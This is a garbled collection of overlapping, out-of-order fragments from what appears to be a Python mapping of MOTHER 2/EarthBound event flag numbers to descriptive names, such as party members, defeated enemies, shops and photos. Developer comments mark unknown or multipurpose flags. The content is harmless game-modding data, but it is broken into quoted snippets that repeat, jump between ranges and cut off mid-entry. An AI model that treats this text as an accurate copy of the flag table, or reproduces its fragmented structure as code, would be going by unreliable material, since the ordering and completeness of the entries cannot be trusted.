'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT',", "74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80:", "'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS',", "'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED',", "621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy", "Flag names for MOTHER2/Earthbound # Luckily, every version uses the same flag IDs", "593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597:", "Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM", "'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs", "'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT',", "'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE',", "when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY',", "'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD',", "'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED',", "492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498:", "424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430:", "652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658:", "reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED',", "644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650:", "'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT',", "'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED', 105:", "400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406:", "20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26:", "'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on death. TODO: Investigate) 476:", "Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60:", "375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid calls you about the", "390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and never", "'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM',", "596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602:", "death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE',", "554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560:", "'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE',", "Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after", "658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664:", "'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE',", "'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ',", "'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201:", "'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573:", "694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700:", "586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?) #", "629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635:", "210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216:", "and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD',", "'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED',", "'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE',", "flags) # 231 (I hate multipurpose flags) # 232 (I hate multipurpose flags)", "'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at", "you talk to Tracy after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', #", "of Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY',", "'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT',", "63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED',", "palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED',", "'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE',", "'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED',", "688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694:", "'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED',", "# 370 (Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', #", "'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK',", "164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', #", "'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469:", "611 (Something about talking to Paula's dad and not talking to Everdred) 612:", "674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something", "387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian", "when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE',", "266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272:", "'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE',", "multipurpose flags) # 227 (I hate multipurpose flags) # 228 (I hate multipurpose", "669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP',", "'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS',", "'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR',", "'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK',", "228 (I hate multipurpose flags) # 229 (I hate multipurpose flags) # 230", "'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG',", "445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450:", "399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405:", "when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE',", "201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207:", "'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER',", "693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699:", "442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???)", "'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS',", "295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel", "doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second", "Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid", "flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls", "613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', #", "'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302", "516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', #", "doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394:", "350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356:", "Yogurt Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???)", "# 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent) 374:", "331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337:", "not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616:", "'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY',", "'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS',", "508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514:", "'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE',", "# 226 (I hate multipurpose flags) # 227 (I hate multipurpose flags) #", "(Something about talking to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF',", "584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for", "452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458:", "367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?)", "# 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528:", "736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742:", "'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\"", "(???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453:", "hate multipurpose flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN',", "TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO:", "'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104:", "748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754:", "'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 